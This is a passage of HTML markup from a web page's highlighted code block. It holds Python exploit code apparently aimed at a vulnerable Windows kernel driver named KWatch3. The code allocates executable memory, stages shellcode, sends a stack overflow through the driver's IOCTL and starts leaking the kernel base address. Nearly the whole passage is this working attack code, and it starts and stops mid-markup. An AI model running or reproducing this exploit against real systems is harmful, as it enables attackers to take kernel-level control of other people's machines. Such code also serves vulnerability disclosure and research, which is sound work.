class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-100\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">dwStatus<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ntdll<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">NtAllocateVirtualMemory<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">0xffffffff<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">byref<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">baseadd<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x0<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> 
<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-101\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-e\">byref<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">size<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-102\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-v\">MEM_RESERVE<\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-v\">MEM_COMMIT<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-103\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-v\">PAGE_EXECUTE_READWRITE<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-104\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">dwStatus<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">!=<\/span><span class=\"crayon-h\"> <\/span><span 
class=\"crayon-v\">STATUS_SUCCESS<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-105\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">\"(-) error while allocating memory: %s\"<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">hex<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">dwStatus<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0xffffffff<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-106\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">sys<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">exit<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-107\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">written<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">c_ulong<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-108\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">write<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">kernel32<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">WriteProcessMemory<\/span><span class=\"crayon-sy\">(<\/span><span 
class=\"crayon-cn\">0xffffffff<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">base<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">input<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">len<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">input<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">byref<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">written<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-109\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">write<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-110\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">\"(-) error while writing our input buffer memory: %s\"<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">write<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-111\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">sys<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">exit<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line 
crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-112\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-113\"><span class=\"crayon-e\">def <\/span><span class=\"crayon-e\">we_can_trigger_overflow<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-114\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">GENERIC_READ<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x80000000<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-115\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">GENERIC_WRITE<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x40000000<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-116\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">OPEN_EXISTING<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x3<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-117\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">IOCTL_VULN<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">get_ioctl<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-118\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">DEVICE_NAME<\/span><span 
class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">\"\\\\\\\\.\\\\KWatch3\"<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-119\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">dwReturn<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">c_ulong<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-120\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">driver_handle<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">kernel32<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">CreateFileA<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">DEVICE_NAME<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">GENERIC_READ<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">GENERIC_WRITE<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">None<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">OPEN_EXISTING<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">None<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" 
id=\"crayon-5a42caec3600a215264132-121\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">ip<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x24242424<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-122\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-123\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">inputbuffer<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x41414141<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-124\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">inputbuffer_size<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x60<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-125\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">outputbuffer_size<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x1000<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-126\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">outputbuffer<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x20000000<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-127\"><span 
class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-128\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">alloc<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">inputbuffer<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">inputbuffer_size<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ip<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-129\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">alloc_shellcode<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">ip<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x100<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-130\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">alloc<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">outputbuffer<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x100<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ip<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-131\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-132\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">IoStatusBlock<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">c_ulong<\/span><span class=\"crayon-sy\">(<\/span><span 
class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-133\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">driver_handle<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-134\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">\"(+) sending stack overflow...\"<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-135\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">dev_ioctl<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ntdll<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">ZwDeviceIoControlFile<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">driver_handle<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-136\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-v\">None<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-137\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span 
class=\"crayon-v\">None<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-138\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-v\">None<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-139\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-e\">byref<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">IoStatusBlock<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-140\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-v\">IOCTL_VULN<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-141\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-v\">inputbuffer<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-142\"><span 
class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-v\">inputbuffer_size<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-143\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-v\">outputbuffer<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-144\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-v\">outputbuffer<\/span><span class=\"crayon-sy\">_<\/span>size<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-145\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-146\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">True<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-147\"><span 
class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">False<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-148\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-149\"><span class=\"crayon-e\">def <\/span><span class=\"crayon-e\">we_can_leak_the_base<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-150\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">\"\"\"<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-151\"><span class=\"crayon-s\">&nbsp;&nbsp;&nbsp;&nbsp;Get kernel base address.<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-152\"><span class=\"crayon-s\">&nbsp;&nbsp;&nbsp;&nbsp;This function uses psapi!EnumDeviceDrivers which is only callable<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-153\"><span class=\"crayon-s\">&nbsp;&nbsp;&nbsp;&nbsp;from a non-restricted caller (medium integrity or higher). Also the<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-154\"><span class=\"crayon-s\">&nbsp;&nbsp;&nbsp;&nbsp;assumption is made that the kernel is the first array element returned.<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-155\"><span class=\"crayon-s\">&nbsp;&nbsp;&nbsp;&nbsp;\"\"\"<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-156\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-m\">global<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">nt<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-157\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">\"(+) enumerating kernel base address...\"<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-158\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-159\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">array<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">c_ulonglong *<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1024<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-160\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">lpImageBase<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">array<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" 
